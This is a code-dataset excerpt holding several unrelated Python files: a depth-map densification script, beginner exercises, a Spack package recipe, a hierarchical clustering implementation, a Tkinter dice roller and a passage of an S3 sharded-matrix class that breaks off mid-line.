cv2.split(cv2.Sobel(image,cv2.CV_64F,0,1,ksize=5))\n img_gradient = cv2.merge((AbsoluteMaximum([xr,xg,xb]),AbsoluteMaximum([yr,yg,yb])))\n \n TG22 = 13573\n \n gx,gy = cv2.split(img_gradient * (2**15))\n mag = cv2.sqrt((gx * gx) \\\n + (gy * gy))\n seeds = []\n edges = np.zeros(mag.shape)\n for x in range(1, img_gradient.shape[0] - 1):\n for y in range(1, img_gradient.shape[1] - 1):\n ax = int(abs(gx[x,y]))\n ay = int(abs(gy[x,y])) << 15\n tg22x = ax * TG22\n m = mag[x,y]\n if (ay < tg22x):\n if 
(m > mag[x,y-1] and\\\n m >= mag[x,y+1]):\n #suppressed[x,y] = m\n if (m > tau_high and soft_edges[x,y] > tau_flow):\n seeds.append((x,y))\n edges[x,y] = 255\n elif (m > tau_low):\n edges[x,y] = 1\n else:\n tg67x = tg22x + (ax << 16)\n if (ay > tg67x):\n if (m > mag[x+1,y] and m >= mag[x-1,y]):\n if (m > tau_high and soft_edges[x,y] > tau_flow):\n seeds.append((x,y))\n edges[x,y] = 255\n elif (m > tau_low):\n edges[x,y] = 1\n else:\n if (int(gx[x,y]) ^ int(gy[x,y]) < 0):\n if (m > mag[x-1,y+1] and m >= mag[x+1,y-1]):\n if (m > tau_high and soft_edges[x,y] > tau_flow):\n seeds.append((x,y))\n edges[x,y] = 255\n elif (m > tau_low):\n edges[x,y] = 1\n else:\n if (m > mag[x-1,y-1] and m > mag[x+1,y+1]):\n if (m > tau_high and soft_edges[x,y] > tau_flow):\n seeds.append((x,y))\n edges[x,y] = 255\n elif (m > tau_low):\n edges[x,y] = 1\n w = img_gradient.shape[0] - 1\n h = img_gradient.shape[1] - 1\n if (dump_debug_images):\n plt.imsave(output_folder + \"/edge_seeds.png\", \\\n edges == 255)\n plt.imsave(output_folder + \"/edge_all_possible.png\", \\\n edges == 1)\n while len(seeds) > 0:\n (x,y) = seeds.pop()\n \n if (x < w and y < h and edges[x+1,y+1] == 1):\n edges[x+1,y+1] = 255\n seeds.append((x+1,y+1))\n if (x > 0 and y < h and edges[x-1,y+1] == 1):\n edges[x-1,y+1] = 255\n seeds.append((x-1,y+1))\n if (y < h and edges[x,y+1] == 1):\n edges[x,y+1] = 255\n seeds.append((x,y+1))\n if (x < w and y > 0 and edges[x+1,y-1] == 1):\n edges[x+1,y-1] = 255\n seeds.append((x+1,y-1))\n if (x > 0 and y > 0 and edges[x-1,y-1] == 1):\n edges[x-1,y-1] = 255\n seeds.append((x-1,y-1))\n if (y > 0 and edges[x,y-1] == 1):\n edges[x,y-1] = 255\n seeds.append((x,y-1))\n if (x < w and edges[x+1,y] == 1):\n edges[x+1,y] = 255\n seeds.append((x+1,y))\n if (x > 0 and edges[x-1,y] == 1):\n edges[x-1,y] = 255\n seeds.append((x-1,y))\n edges[edges == 1] = 0\n return edges\n \ndef GetInitialization(sparse_points, last_depth_map):\n initialization = sparse_points.copy()\n if last_depth_map.size > 0:\n initialization[last_depth_map > 0] = 1.0 / last_depth_map[last_depth_map > 0]\n \n w = edges.shape[0]\n h = edges.shape[1]\n last_known = -1\n first_known = -1\n for col in range(0,w):\n for row in range(0,h):\n if (sparse_points[col, row] > 0):\n last_known = 1.0 / sparse_points[col, row]\n elif (initialization[col, row] > 0):\n last_known = initialization[col, row]\n if (first_known < 0):\n first_known = last_known\n initialization[col, row] = last_known\n initialization[initialization < 0] = first_known\n \n return initialization\n \n \ndef DensifyFrame(sparse_points, hard_edges, soft_edges, last_depth_map):\n w = sparse_points.shape[0]\n h = sparse_points.shape[1]\n num_pixels = w * h\n A = scipy.sparse.dok_matrix((num_pixels * 3, num_pixels), dtype=np.float32)\n A[A > 0] = 0\n A[A < 0] = 0\n b = np.zeros(num_pixels * 3, dtype=np.float32)\n x0 = np.zeros(num_pixels, dtype=np.float32)\n num_entries = 0\n \n smoothness = np.maximum(1 - soft_edges, 0)\n smoothness_x = np.zeros((w,h), dtype=np.float32)\n smoothness_y = np.zeros((w,h), dtype=np.float32)\n initialization = GetInitialization(sparse_points, last_depth_map)\n \n if (dump_debug_images):\n plt.imsave(output_folder + \"/solver_initialization\" + \".png\", \\\n initialization)\n plt.imsave(output_folder + \"/sparse_points_\" + \".png\", \\\n sparse_points)\n plt.imsave(output_folder + \"/soft_edges_\" + \".png\", \\\n soft_edges)\n plt.imsave(output_folder + \"/hard_edges_\" + \".png\", \\\n hard_edges)\n \n for row in range(1,h - 1):\n for col in range(1,w - 1):\n 
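# Annotation (inferred from this code, not from the paper): the loop below\n            # assembles a sparse overdetermined system A*d = b over inverse depths d.\n            # Each interior pixel contributes at most one data constraint (weight\n            # lambda_d for sparse points, else lambda_t for the previous frame) and\n            # two smoothness constraints toward adjacent neighbors (one per axis),\n            # weighted by the soft edges and dropped across hard Canny edge\n            # boundaries.\n            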
x0[col + row * w] = initialization[col, row]\n # Add the data constraints\n if (sparse_points[col, row] > 0.00):\n A[num_entries, col + row * w] = lambda_d\n b[num_entries] = (1.0 / sparse_points[col, row]) * lambda_d\n num_entries += 1\n elif (last_depth_map.size > 0 and last_depth_map[col, row] > 0):\n A[num_entries, col + row * w] = lambda_t\n b[num_entries] = (1.0 / last_depth_map[col, row]) * lambda_t\n num_entries += 1\n \n # Add the smoothness constraints\n smoothness_weight = lambda_s * min(smoothness[col, row], \\\n smoothness[col - 1, row])\n if (hard_edges[col, row] == hard_edges[col - 1, row]):\n smoothness_x[col,row] = smoothness_weight\n A[num_entries, (col - 1) + row * w] = smoothness_weight\n A[num_entries, col + row * w] = -smoothness_weight\n b[num_entries] = 0\n num_entries += 1\n \n smoothness_weight = lambda_s * min(smoothness[col,row], \\\n smoothness[col, row - 1])\n if (hard_edges[col,row] == hard_edges[col, row - 1]):\n smoothness_y[col,row] = smoothness_weight\n A[num_entries, col + (row - 1) * w] = smoothness_weight\n A[num_entries, col + row * w] = -smoothness_weight\n b[num_entries] = 0\n num_entries += 1\n \n \n # Solve the system\n if (dump_debug_images):\n plt.imsave(output_folder + \"/solver_smoothness_x_\" + \".png\", \\\n smoothness_x)\n plt.imsave(output_folder + \"/solver_smoothness_y_\" + \".png\", \\\n smoothness_y)\n\n [x,info] = scipy.sparse.linalg.cg(A.transpose() * A, \\\n A.transpose() * b, x0, 1e-05, num_solver_iterations)\n if info < 0:\n print(\"====> Error! Illegal input!\")\n elif info > 0:\n print(\"====> Ran \" + str(info) + \" solver iterations.\")\n else:\n print(\"====> Solver converged!\")\n \n depth = np.zeros(sparse_points.shape, dtype=np.float32)\n\n # Copy back the pixels\n for row in range(0,h):\n for col in range(0,w):\n dis = x[col + row * w]\n if dis > 0:\n depth[col,row] = 1.0 / dis\n\n return depth\n\ndef TemporalMedian(depth_maps):\n lists = {}\n depth_map = depth_maps[0].copy()\n h = depth_map.shape[0]\n w = depth_map.shape[1]\n for row in range(0,h):\n for col in range(0,w):\n values = []\n for img in depth_maps:\n if (img[row,col] > 0):\n values.append(img[row, col])\n if len(values) > 0:\n depth_map[row,col] = np.median(np.array(values))\n else:\n depth_map[row,col] = 0\n return depth_map\n\ndef generate_pointcloud(rgb, depth, intrinsics=None, ply_file=None):\n points = []\n if intrinsics is not None:\n fx = intrinsics[0, 0]\n fy = intrinsics[1, 1]\n cx = intrinsics[0, 2]\n cy = intrinsics[1, 2]\n\n for v in range(rgb.shape[0]):\n for u in range(rgb.shape[1]):\n color = rgb[v, u, :]\n Z = depth[v, u]\n if Z==0:\n continue\n if intrinsics is not None:\n X = (u - cx) * Z / fx\n Y = (v - cy) * Z / fy\n else:\n X = u\n Y = v\n points.append(\"%f %f %f %d %d %d 0\\n\"%(X,Y,Z,color[0],color[1],color[2]))\n file = open(ply_file,\"w\")\n file.write('''ply\n format ascii 1.0\n element vertex %d\n property float x\n property float y\n property float z\n property uchar red\n property uchar green\n property uchar blue\n property uchar alpha\n end_header\n %s\n '''%(len(points),\"\".join(points)))\n file.close()\n\ndef generate_pc_kinect(rgb, depth, pc_pred_path):\n P_rect = np.eye(3, 3)\n P_rect[0,0] = 400.516317\n P_rect[0,2] = 320.171183\n P_rect[1,1] = 400.410970\n P_rect[1,2] = 243.274495\n\n # build_output_dir(output_folder)\n generate_pointcloud(rgb, depth, intrinsics=P_rect, ply_file=pc_pred_path)\n\nif __name__ == \"__main__\":\n last_depths = []\n last_depth = np.array([])\n\n data_path = 
'/home/nod/project/dso/build/sample/000068.pkl'\n data = open(data_path,\"rb\")\n data_dict = pickle.load(data)\n\n rgb = data_dict['rgb']\n depth_pred = data_dict['depth_pred'] * 0.7131490173152352\n depth_dso = np.array(Image.open('/home/nod/project/dso/build/sample/00023.png'), np.float) * 0.00666\n depth_gt = np.array(data_dict['depth_gt'], np.float) / 1000\n\n rgb_before = np.array(Image.open('/home/nod/project/dso/build/sample/00065.jpg'))\n rgb_after = np.array(Image.open('/home/nod/project/dso/build/sample/00071.jpg'))\n depth_pred_image = np.array(Image.open('/home/nod/project/dso/build/sample/depth_pred.png'))\n\n base_img = rgb\n flows = []\n flows.append(GetFlow(base_img, rgb_before))\n flows.append(GetFlow(base_img, rgb_after))\n soft_edges = GetSoftEdges(base_img, flows)\n edges = Canny(soft_edges, base_img)\n\n depth_final = DensifyFrame(depth_dso, edges, soft_edges, last_depth)\n data_dict = {'depth_densify': depth_final,\n 'rgb': rgb,\n 'depth_pred': depth_pred,\n 'depth_dso': depth_dso,\n 'depth_gt': depth_gt,\n 'soft_edges': soft_edges,\n 'edge': edges,\n 'flows': flows}\n dict_file_name = '/home/nod/project/dso/build/sample/00068_densify.pkl'\n f = open(dict_file_name,\"wb\")\n pickle.dump(data_dict, f)\n f.close()\n\n # depth_final = DensifyFrame(sparse_points, soft_edges, dense_points) * 100\n # depth_final = depth_gt\n # depth_final = bilateral_filter(depth_pred_image, depth_dso)\n\n plt.imshow(depth_final)\n plt.show(block=True)\n import pdb; pdb.set_trace()\n pc_path = '/home/nod/project/dso/build/sample/00068.ply'\n generate_pc_kinect(rgb, depth_final, pc_path)","sub_path":"densify/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":24509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"132295562","text":"\"\"\"\nMadelyn Reyes\nSeptember 18, 2015\nTravelling Distance\n\"\"\"\nspeed = int(input('What is the speed of the vehicle in mph? ')) #asking user for speed\nhour = int(input('How many hours has it traveled? ')) #asking user for hours/time\ndistance= 1\n\nprint(\"Hour\\tDistance traveled\") #making table\nprint('-------------------------') #making line\n\n\nfor hour in range(1,hour+1): # for the variable hour that the user inputs, \n distance = speed * hour #distance formula\n print(hour,\"\\t\",distance) #printing output\n\n \n\n\n\n","sub_path":"travellingdistance.py","file_name":"travellingdistance.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"543802066","text":"\ncont=soma=0\nwhile True:\n n=int(input('Digite um valor (999 para parar):'))\n if n==999:\n break\n soma+=n\n cont+=1\n \nprint(f'Você digitou {cont} valores\\ne a soma deles é igual a {soma}')\n\n","sub_path":"EXERCÍCIOS_CURSO-EM-VIDEO/ex_WHILE_TRUE.py","file_name":"ex_WHILE_TRUE.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"449901246","text":"# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other\n# Spack Project Developers. 
See the top-level COPYRIGHT file for details.\n#\n# SPDX-License-Identifier: (Apache-2.0 OR MIT)\n\nfrom spack.package import *\n\n\nclass PyBuild(PythonPackage):\n \"\"\"A simple, correct PEP517 package builder.\"\"\"\n\n homepage = \"https://github.com/pypa/build\"\n pypi = \"build/build-0.7.0.tar.gz\"\n\n version(\"0.7.0\", sha256=\"1aaadcd69338252ade4f7ec1265e1a19184bf916d84c9b7df095f423948cb89f\")\n\n variant(\"virtualenv\", default=False, description=\"Install optional virtualenv dependency\")\n\n depends_on(\"python@3.6:\", type=(\"build\", \"run\"))\n depends_on(\"py-setuptools\", type=\"build\")\n depends_on(\"py-packaging@19:\", type=(\"build\", \"run\"))\n depends_on(\"py-pep517@0.9.1:\", type=(\"build\", \"run\"))\n depends_on(\"py-tomli@1:\", type=(\"build\", \"run\"))\n depends_on(\"py-colorama\", when=\"platform=windows\", type=(\"build\", \"run\"))\n depends_on(\"py-importlib-metadata@0.22:\", when=\"^python@:3.7\", type=(\"build\", \"run\"))\n depends_on(\"py-virtualenv@20.0.35:\", when=\"+virtualenv\", type=(\"build\", \"run\"))\n\n # https://github.com/pypa/build/issues/266\n # https://github.com/pypa/build/issues/406\n patch(\"isolation.patch\", when=\"@0.7.0\")\n","sub_path":"var/spack/repos/builtin/packages/py-build/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"385888419","text":"import pickle\nimport os\nimport argparse\nfrom pprint import pprint\nimport numpy as np\nimport math\nfrom scipy.cluster.hierarchy import dendrogram\nimport matplotlib.pyplot as plt\n\nclass Agglomerative_Hierarchical:\n \"\"\"\n This class contains functions which comprise the core implementation of agglomerative\n hierarchical clustering.\n\n @author : Naren Surampudi\n \"\"\"\n\n def matrix_min(self, matrix, traversed_points):\n \"\"\"\n This function returns the minimum value in matrix. 
Traverse points are avoided in\n minimum calculation.\n\n Parameters\n ----------\n matrix : list\n The matrix whose minimum element is to be calculated.\n traversed_points : list\n The list of points already traverse elsewhere.\n\n Returns\n -------\n type : list\n A list consisting of the minimum element's coordinates.\n \"\"\"\n min_val = 9999\n min_i = 0\n min_j = 0\n for i in range(len(matrix)):\n \tfor j in range(len(matrix[i])):\n \t\tif i not in traversed_points and j not in traversed_points:\n \t\t\tif matrix[i][j] < min_val and matrix[i][j] > 0:\n \t\t\t\tmin_val = matrix[i][j]\n \t\t\t\tmin_i = i\n \t\t\t\tmin_j = j\n\n return [min_i, min_j]\n\n def min_cluster_distance(self, matrix, cluster1, cluster2):\n \"\"\"\n This function calculates the minimum distance between two clusters of points.\n\n Parameters\n ----------\n matrix : list\n The matrix to be operated upon.\n cluster1 : list\n Cluster of points.\n cluster2 : list\n Cluster of points.\n\n Returns\n -------\n type : int\n Minimum distance between the two passed clusters.\n \"\"\"\n dist_list = []\n\n if isinstance(cluster1, int):\n \tcluster1 = [cluster1]\n elif isinstance(cluster2, int):\n \tcluster2 = [cluster2]\n for point1 in cluster1:\n \tfor point2 in cluster2:\n \t\tdist = matrix[point1][point2]\n \t\tif dist > 0:\n \t\t\tdist_list.append(dist)\n\n return min(dist_list)\n\n def max_cluster_distance(self, matrix, cluster1, cluster2):\n \"\"\"\n This function calculates the maximum distance between two clusters of points.\n\n Parameters\n ----------\n matrix : list\n The matrix to be operated upon.\n cluster1 : list\n Cluster of points.\n cluster2 : list\n Cluster of points.\n\n Returns\n -------\n type : int\n Maximum distance between the two passed clusters.\n \"\"\"\n dist_list = []\n\n if isinstance(cluster1, int):\n \tcluster1 = [cluster1]\n elif isinstance(cluster2, int):\n \tcluster2 = [cluster2]\n for point1 in cluster1:\n \tfor point2 in cluster2:\n \t\tdist = matrix[point1][point2]\n \t\tif dist > 0:\n \t\t\tdist_list.append(dist)\n\n return max(dist_list)\n\n def avg_cluster_distance(self, matrix, cluster1, cluster2):\n \"\"\"\n This function calculates the average distance between two clusters of points.\n\n Parameters\n ----------\n matrix : list\n The matrix to be operated upon.\n cluster1 : list\n Cluster of points.\n cluster2 : list\n Cluster of points.\n\n Returns\n -------\n type : int\n Average distance between the two passed clusters.\n \"\"\"\n dist_list = []\n\n if isinstance(cluster1, int):\n \tcluster1 = [cluster1]\n elif isinstance(cluster2, int):\n \tcluster2 = [cluster2]\n for point1 in cluster1:\n \tfor point2 in cluster2:\n \t\tdist = matrix[point1][point2]\n \t\tif dist > 0:\n \t\t\tdist_list.append(dist)\n\n return sum(dist_list) / ((len(cluster1) * len(cluster2)))\n\n def matrix_gen(self, matrix, cluster, flag):\n \"\"\"\n This function generates a new proximity matrix after cluster calculation.\n\n Parameters\n ----------\n matrix : list\n The matrix to be operated upon.\n cluster : list\n The newly formed cluster of points.\n flag : int\n A parameter that specifies the type of linkage to use.\n\n Returns\n -------\n type : list\n The newly calculated proximity matrix.\n \"\"\"\n matrix = np.asarray(matrix)\n dist_vector = []\n for cluster1 in range(matrix.shape[0]):\n \tif flag == 0:\n \t\tdist_vector.append(self.min_cluster_distance(matrix.tolist(), cluster, cluster1))\n \telif flag == 1:\n \t\tdist_vector.append(self.max_cluster_distance(matrix.tolist(), cluster, cluster1))\n 
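\t# flag selects the linkage criterion: 0 = single-link (min distance),\n \t# 1 = complete-link (max distance), 2 = group-average.\n 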
\telif flag == 2:\n \t\tdist_vector.append(self.avg_cluster_distance(matrix.tolist(), cluster, cluster1))\n matrix = np.vstack((matrix, dist_vector))\n dist_vector.append(0)\n matrix = np.column_stack((matrix, np.asarray(dist_vector)))\n matrix.tolist()\n\n return matrix\n\n def clustering(self, matrix, flag):\n \"\"\"\n This function progressively performs agglomerative clustering. The heart of the entire\n class that calls all other relevant methods.\n\n Parameters\n ----------\n matrix : list\n The proximity matrix to be operated upon.\n flag : int\n A parameter that specifies the type of linkage to use.\n\n Returns\n -------\n type : list\n A list consisting of the final priority matrix and the linkage matrix.\n \"\"\"\n total = len(matrix[0])\n K = 1\n linkage_matrix = np.zeros(shape=(total-1, 4))\n traversed_points = []\n cluster_numbers = {}\n lflag = total\n\n while K < total:\n \tcluster = self.matrix_min(matrix, traversed_points)\n \tif cluster[0] not in traversed_points and cluster[1] not in traversed_points:\n \t\tmatrix = self.matrix_gen(matrix, cluster, flag)\n \t\ttemp = 0\n \t\tif str(cluster[0]) in cluster_numbers.keys():\n \t\t\ttemp = temp + cluster_numbers[str(cluster[0])]\n \t\telse:\n \t\t\ttemp = temp + 1\n \t\tif str(cluster[1]) in cluster_numbers.keys():\n \t\t\ttemp = temp + cluster_numbers[str(cluster[1])]\n \t\telse:\n \t\t\ttemp = temp + 1\n \t\tlinkage_matrix[K-1] = [cluster[0], cluster[1], matrix[cluster[0]][cluster[1]], temp]\n \t\tlflag = lflag + 1\n \t\tcluster_numbers[str(lflag)] = temp\n \t\ttraversed_points.append(cluster[0])\n \t\ttraversed_points.append(cluster[1])\n \tK = K + 1\n\n return [matrix, linkage_matrix]\n\nclass Proximity_Matrix:\n \"\"\"\n This class is called in the very beginning, when calculating the proximity matrix for\n the first time from the data.\n \"\"\"\n\n def distance(self, sample1, sample2):\n \"\"\"Short summary.\n\n Parameters\n ----------\n sample1 : list\n A sample in the data.\n sample2 : list\n A sample in the data.\n\n Returns\n -------\n type : float\n The distance between the two samples.\n \"\"\"\n edist = 0\n for i in range(len(sample1)):\n \tdist = 0\n \tfor j in range(len(sample1[i])):\n \t\tdist = dist + abs(sample1[i][j] - sample2[i][j])\n \t\tedist = edist + dist\n\n return math.sqrt(edist)\n\n def raw_matrix(self, data):\n \"\"\"\n This function calculates the first proximity matrix.\n\n Parameters\n ----------\n data : list\n The processed data, obtained from raw data.\n\n Returns\n -------\n type : list\n The very first proximity matrix.\n \"\"\"\n matrix = []\n\n for sample1 in data:\n \tl = []\n \tfor sample2 in data:\n \t\tdist = self.distance(sample1, sample2)\n \t\tl.append(dist)\n \tmatrix.append(l)\n\n return matrix\n\nif __name__ == \"__main__\":\n\n agglomerative = Agglomerative_Hierarchical()\n proximity = Proximity_Matrix()\n\n parser = argparse.ArgumentParser(description=\"Choose hierarchy link\")\n parser.add_argument('link', help=\"Which link to use\")\n args = parser.parse_args()\n link = vars(args)['link']\n c_flag = None\n # test = True\n test = False # Flags for running the program in testing mode.\n\n if test: # The proximity matrix to be used for testing.\n matrix = [[0, 0.23, 0.22, 0.37, 0.34, 0.24],\n \t\t [0.23, 0, 0.14, 0.19, 0.14, 0.24],\n \t\t [0.22, 0.14, 0, 0.16, 0.28, 0.1],\n \t\t [0.37, 0.19, 0.16, 0, 0.28, 0.22],\n \t\t [0.34, 0.14, 0.28, 0.28, 0, 0.39],\n \t\t [0.24, 0.24, 0.1, 0.22,0.39, 0]]\n else:\n matrix_file = \"proximity_matrix.pkl\"\n if os.path.isfile(matrix_file):\n 
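\t# Reuse the proximity matrix cached by an earlier run instead of\n \t# recomputing all O(n^2) pairwise distances.\n 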
\tmatrix_f = open(matrix_file, 'rb')\n \tmatrix = pickle.load(matrix_f)\n \tmatrix_f.close()\n else:\n \tdfile = open('matrix_data.txt', 'rb')\n \tdata = pickle.load(dfile)\n \t# data = data[0:100]\n \tmatrix = proximity.raw_matrix(data)\n \tmatrix_f = open(matrix_file, 'wb')\n \tpickle.dump(matrix, matrix_f)\n \tmatrix_f.close()\n \tdfile.close()\n\n if link == \"single-link\":\n c_flag = 0\n elif link == \"complete-link\":\n c_flag = 1\n elif link == \"group-average\":\n c_flag = 2\n\n linkage_matrix = agglomerative.clustering(matrix, c_flag)[1]\n\n pprint(linkage_matrix)\n\n # fig = plt.figure(figsize=(8, 4))\n # dendrogram = dendrogram(linkage_matrix) # Draw dendrogram of final clusters.\n # plt.show()\n","sub_path":"Hierarchical Clustering/Agglomerative/agglomerative_clustering.py","file_name":"agglomerative_clustering.py","file_ext":"py","file_size_in_byte":9597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"253199893","text":"import random\nfrom tkinter import *\n\n\nroot = Tk()\n\nroot.geometry(\"1920x1200\")\nl1 = Label(root,\n fg=\"white\",\n bg=\"black\",\n width=1920,\n height=1200,\n font=('times', 200))\n\n\ndef dice_roll():\n \"\"\"\n Dice roll\n \"\"\"\n number = ['\\u2680', '\\u2681', '\\u2682', '\\u2683', '\\u2684', '\\u2685']\n l1.config(text=f'{random.choice(number)}{random.choice(number)}')\n l1.pack(pady=10, padx=10)\n\n\nb1 = Button(root, text='Roll the Die', relief=RAISED, command=dice_roll)\nb1.place(x=880, y=0)\n\nroot.mainloop()\n","sub_path":"dice_roll_gui.py","file_name":"dice_roll_gui.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"126519154","text":"import boto3\nimport cloudpickle\nimport itertools\nimport concurrent.futures as fs\nimport io\nimport numpy as np\nimport time\n\n\ndef list_all_keys(bucket, prefix):\n client = boto3.client('s3')\n objects = client.list_objects(Bucket=bucket, Prefix=prefix, Delimiter=prefix)\n keys = list(map(lambda x: x['Key'], objects['Contents']))\n truncated = objects['IsTruncated']\n next_marker = objects.get('NextMarker')\n while (truncated):\n objects = client.list_objects(Bucket=bucket, Prefix=prefix, Delimiter=prefix, Marker=next_marker)\n truncated = objects['IsTruncated']\n next_marker = objects.get('NextMarker')\n keys += list(map(lambda x: x['Key'], objects['Contents']))\n return list(filter(lambda x: len(x) > 0, keys))\n\ndef block_key_to_block(key):\n try:\n block_key = key.split(\"/\")[-1]\n blocks_split = block_key.split(\"_\")\n b0_start = int(blocks_split[0])\n b0_end = int(blocks_split[1])\n b1_start = int(blocks_split[3])\n b1_end = int(blocks_split[4])\n return ((b0_start, b0_end), (b1_start, b1_end))\n except:\n return None\n\nclass ShardedMatrix(object):\n def __init__(self, key,\n shard_sizes,\n shape=None,\n bucket=None,\n prefix='pywren.linalg/'):\n self.bucket = bucket\n self.prefix = prefix\n self.key = key\n self.key_base = prefix + self.key + \"/\"\n shard_size_0 = shard_sizes[0]\n shard_size_1 = shard_sizes[1]\n header = self.__read_header__()\n self.replication_factor = 1\n\n if header is None and shape is None:\n raise Exception(\"header doesn't exist and no shape provided\")\n if not (header is None) and shape is None:\n self.shard_size_0 = header.shard_size_0\n self.shard_size_1 = header.shard_size_1\n self.shape = header.shape\n else:\n self.shape = shape\n self.shard_size_0 = shard_size_0\n self.shard_size_1 = shard_size_1\n\n if 
self.shard_size_0 is None:\n raise Exception(\"No shard_0_size provided\")\n if self.shard_size_1 is None:\n self.shard_size_1 = self.shape[1]\n\n self.symmetric = False\n self.shard_sizes = (self.shard_size_0, self.shard_size_1)\n self.__write_header__()\n\n @property\n def blocks_exist(self):\n #slow\n prefix = self.prefix + self.key\n all_keys = list_all_keys(self.bucket, prefix)\n return list(filter(lambda x: x != None, map(block_key_to_block, all_keys)))\n\n @property\n def blocks(self):\n return self._blocks()\n\n @property\n def block_idxs_exist(self):\n all_block_idxs = self.block_idxs\n all_blocks = self.blocks\n blocks_exist = set(self.blocks_exist)\n block_idxs_exist = []\n for i, block in enumerate(all_blocks):\n if block in blocks_exist:\n block_idxs_exist.append(all_block_idxs[i])\n return block_idxs_exist\n\n @property\n def blocks_not_exist(self):\n blocks = set(self.blocks)\n block_exist = set(self.blocks_exist)\n return list(filter(lambda x: x, list(block_exist.symmetric_difference(blocks))))\n\n @property\n def block_idxs_not_exist(self):\n block_idxs = set(self.block_idxs)\n block_idxs_exist = set(self.block_idxs_exist)\n return list(filter(lambda x: x, list(block_idxs_exist.symmetric_difference(block_idxs))))\n\n\n\n\n @property\n def block_idxs(self):\n return self._block_idxs()\n\n def _blocks(self, axis=None):\n\n blocks_x = [(i, i + self.shard_size_0) for i in range(0, self.shape[0], self.shard_size_0)]\n\n if blocks_x[-1][1] > self.shape[0]:\n blocks_x.pop()\n\n if blocks_x[-1][1] < self.shape[0]:\n blocks_x.append((blocks_x[-1][1], self.shape[0]))\n\n\n blocks_y = [(i, i + self.shard_size_1) for i in range(0, self.shape[1], self.shard_size_1)]\n\n if blocks_y[-1][1] > self.shape[1]:\n blocks_y.pop()\n\n if blocks_y[-1][1] < self.shape[1]:\n blocks_y.append((blocks_y[-1][1], self.shape[1]))\n\n if axis is None:\n return list(itertools.product(blocks_x, blocks_y))\n elif axis == 0:\n return blocks_x\n elif axis == 1:\n return blocks_y\n else:\n raise Exception(\"Invalid Axis\")\n\n def _block_idxs(self, axis=None):\n blocks_x = list(range(len(self._blocks(axis=0))))\n blocks_y = list(range(len(self._blocks(axis=1))))\n\n if axis is None:\n return list(itertools.product(blocks_x, blocks_y))\n elif axis == 0:\n return blocks_x\n elif axis == 1:\n return blocks_y\n else:\n raise Exception(\"Invalid Axis\")\n\n def idx_to_block_idx(self, idx_1, idx_2):\n blocks_x = self._blocks(0)\n blocks_y = self._blocks(1)\n\n block_x = -1\n block_y = -1\n\n for i, (blk_start, blk_end) in enumerate(blocks_x):\n if blk_start <= idx_1 and blk_end > idx_1:\n block_x = i\n offset_x = idx_1 - blk_start\n\n for i, (blk_start, blk_end) in enumerate(blocks_y):\n if blk_start <= idx_2 and blk_end > idx_2:\n block_y = i\n offset_y = idx_2 - blk_start\n\n if block_x == -1:\n raise Exception(\"Index 0 out of bounds\")\n\n if block_y == -1:\n raise Exception(\"Index 1 out of bounds\")\n\n return block_x, block_y, offset_x, offset_y\n\n\n def __getitem__(self, idxs):\n idx_1, idx_2 = idxs\n\n if isinstance(idx_1, slice):\n raise Exception(\"Slicing in first index not implemented\")\n\n if isinstance(idx_2, slice):\n if idx_2.start != None or idx_2.step != None or idx_2.stop != None:\n raise Exception(\"Only full row slices supported\")\n blocks_y_idxs = self._block_idxs(axis=1)\n blocks = []\n block_x, block_y, offset_x, offset_y = self.idx_to_block_idx(idx_1, 0)\n for blk_idx in blocks_y_idxs:\n blocks.append(self.get_block(block_x, blk_idx))\n return np.hstack(blocks)[offset_x, :]\n\n else:\n 
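# Scalar access: locate the block that owns (idx_1, idx_2) and the offset\n            # inside it, then download only that one block from S3. (For uniform\n            # shard sizes this is equivalent to idx // shard_size.)\n            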
block_x, block_y, offset_x, offset_y = self.idx_to_block_idx(idx_1, idx_2)\n block_data = self.get_block(block_x, block_y)\n return block_data[offset_x, offset_y]\n\n def __get_matrix_shard_key__(self, start_0, end_0, start_1, end_1, replicate=0):\n rep = str(replicate)\n key_string = \"{0}_{1}_{2}_{3}_{4}_{5}_{6}\".format(start_0, end_0, self.shard_size_0, start_1, end_1, self.shard_size_1, rep)\n return self.key_base + key_string\n\n\n\n def __read_header__(self):\n client = boto3.client('s3')\n try:\n key = self.key_base + \"header\"\n header = cloudpickle.loads(client.get_object(Bucket=self.bucket, Key=key)['Body'].read())\n except:\n header = None\n return header\n\n\n def __write_header__(self):\n client = boto3.client('s3')\n key = self.key_base + \"header\"\n client.put_object(Key=key, Bucket = self.bucket, Body=cloudpickle.dumps(self), ACL=\"bucket-owner-full-control\")\n return 0\n\n def __shard_idx_to_key__(self, shard_0, shard_1, replicate=0):\n N = self.shape[0]\n D = self.shape[1]\n start_0 = shard_0*self.shard_size_0\n start_1 = shard_1*self.shard_size_1\n end_0 = min(start_0+self.shard_size_0, N)\n end_1 = min(start_1+self.shard_size_1, D)\n key = self.__get_matrix_shard_key__(start_0, end_0, start_1, end_1, replicate)\n return key\n\n def __s3_key_to_byte_io__(self, key):\n n_tries = 0\n max_n_tries = 5\n bio = None\n client = boto3.client('s3')\n while bio is None and n_tries <= max_n_tries:\n try:\n bio = io.BytesIO(client.get_object(Bucket=self.bucket, Key=key)['Body'].read())\n except Exception as e:\n n_tries += 1\n if bio is None:\n raise Exception(\"S3 Read Failed\")\n return bio\n\n def __save_matrix_to_s3__(self, X, out_key, client=None):\n if (client == None):\n client = boto3.client('s3')\n outb = io.BytesIO()\n np.save(outb, X)\n response = client.put_object(Key=out_key, Bucket=self.bucket, Body=outb.getvalue(),ACL=\"bucket-owner-full-control\")\n return response\n\n def shard_matrix(self, X, executor=None, n_jobs=1):\n bidxs = self.block_idxs\n blocks = self.blocks\n if (executor is None):\n executor = fs.ThreadPoolExecutor(n_jobs)\n\n futures = []\n for ((bidx_0, bidx_1),(block_0, block_1)) in zip(bidxs, 